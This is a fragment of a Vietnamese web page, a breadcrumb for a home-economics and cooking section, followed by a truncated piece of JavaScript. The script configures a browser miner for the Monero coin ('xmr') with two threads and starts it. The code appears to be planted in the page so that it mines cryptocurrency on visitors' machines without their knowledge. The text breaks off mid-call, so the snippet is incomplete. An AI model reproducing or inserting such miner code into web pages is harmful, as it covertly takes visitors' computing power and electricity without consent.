Trang chủ » Nữ công gia chánh
', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();